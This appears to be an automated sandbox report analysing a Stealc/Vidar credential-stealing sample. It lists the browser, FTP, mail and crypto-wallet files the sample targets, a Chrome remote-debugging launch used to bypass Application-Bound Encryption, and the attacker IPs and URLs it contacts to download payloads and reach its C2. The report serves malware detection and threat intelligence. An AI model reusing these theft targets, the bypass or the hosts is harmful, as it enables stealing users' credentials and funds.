Source: file.exe, 00000000.00000002.2685963034.0000000001138000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.**
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Directory queried: C:\Users\user\Documents Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2684323133.000000000099C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2685963034.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2126870772.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2684323133.00000000008D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4340, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB50C40 sqlite3_bind_zeroblob, 0_2_6CB50C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB50D60 sqlite3_bind_parameter_name, 0_2_6CB50D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA78EA0 sqlite3_clear_bindings, 0_2_6CA78EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB50B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CB50B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA76410 bind,WSAGetLastError, 0_2_6CA76410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA760B0 listen,WSAGetLastError, 0_2_6CA760B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7C030 sqlite3_bind_parameter_count, 0_2_6CA7C030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA76070 PR_Listen, 0_2_6CA76070
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1570734 Sample: file.exe Startdate: 07/12/2024 Architecture: WINDOWS Score: 100 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Antivirus detection for URL or domain 2->75 77 12 other signatures 2->77 8 file.exe 36 2->8         started        13 skotes.exe 12 2->13         started        15 skotes.exe 2->15         started        17 msedge.exe 9 2->17         started        process3 dnsIp4 59 185.215.113.206, 49707, 49743, 49790 WHOLESALECONNECTIONSNL Portugal 8->59 61 185.215.113.16, 49827, 80 WHOLESALECONNECTIONSNL Portugal 8->61 63 127.0.0.1 unknown unknown 8->63 43 C:\Users\user\Documents\KKFBAAFCGI.exe, PE32 8->43 dropped 45 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->45 dropped 47 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->47 dropped 49 11 other files (7 malicious) 8->49 dropped 89 Detected unpacking (changes PE section rights) 8->89 91 Attempt to bypass Chrome Application-Bound Encryption 8->91 93 Drops PE files to the document folder of the user 8->93 101 8 other signatures 8->101 19 cmd.exe 1 8->19         started        21 msedge.exe 2 10 8->21         started        24 chrome.exe 8->24         started        65 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 13->65 95 Hides threads from debuggers 13->95 97 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->97 99 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->99 27 msedge.exe 17->27         started        file5 signatures6 process7 dnsIp8 29 KKFBAAFCGI.exe 4 19->29         started        33 conhost.exe 19->33         started        79 Monitors registry run keys for changes 21->79 35 msedge.exe 21->35         started        67 192.168.2.6, 443, 49702, 49705 unknown unknown 24->67 69 239.255.255.250 unknown Reserved 24->69 37 chrome.exe 24->37         started        signatures9 process10 dnsIp11 51 C:\Users\user\AppData\Local\...\skotes.exe, PE32 29->51 dropped 103 Antivirus detection for dropped file 29->103 105 Detected unpacking (changes PE section rights) 29->105 107 Machine Learning detection for dropped file 29->107 109 6 other signatures 29->109 40 skotes.exe 29->40         started        53 www.google.com 142.250.181.68, 443, 49712, 49713 GOOGLEUS United States 37->53 55 play.google.com 172.217.19.206, 443, 49754, 49755 GOOGLEUS United States 37->55 57 4 other IPs or domains 37->57 file12 signatures13 process14 signatures15 81 Antivirus detection for dropped file 40->81 83 Detected unpacking (changes PE section rights) 40->83 85 Tries to detect sandboxes and other dynamic analysis tools (window names) 40->85 87 6 other signatures 40->87
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.19.206
 www3.l.google.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.6
127.0.0.1

Contacted Domains

Name IP Active
www3.l.google.com 172.217.19.206 true
plus.l.google.com 172.217.17.46 true
play.google.com 172.217.19.206 true
www.google.com 142.250.181.68 true
ogs.google.com unknown unknown
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll false
    		high
    http://185.215.113.206/68b591d6548ec281/vcruntime140.dll false
      		high
      http://185.215.113.206/ false
        		high
        http://185.215.113.16/mine/random.exe false
          		high
          http://185.215.113.206/68b591d6548ec281/sqlite3.dll false
            		high
            http://185.215.113.43/Zu7JuNko/index.php false
              		high
              http://185.215.113.206/68b591d6548ec281/freebl3.dll false
                		high
                http://185.215.113.206/68b591d6548ec281/nss3.dll false
                  		high
                  http://185.215.113.206/68b591d6548ec281/mozglue.dll false
                    		high
                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
                      		high
                      185.215.113.206/c4becf79229cb002.php false
                        		high
                        http://185.215.113.206/68b591d6548ec281/msvcp140.dll false
                          		high
                          http://185.215.113.206/c4becf79229cb002.php false
                            		high
                            https://www.google.com/async/newtab_promos false
                              		high
                              https://www.google.com/async/ddljson?async=ntp:2 false
                                		high
                                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
                                  		high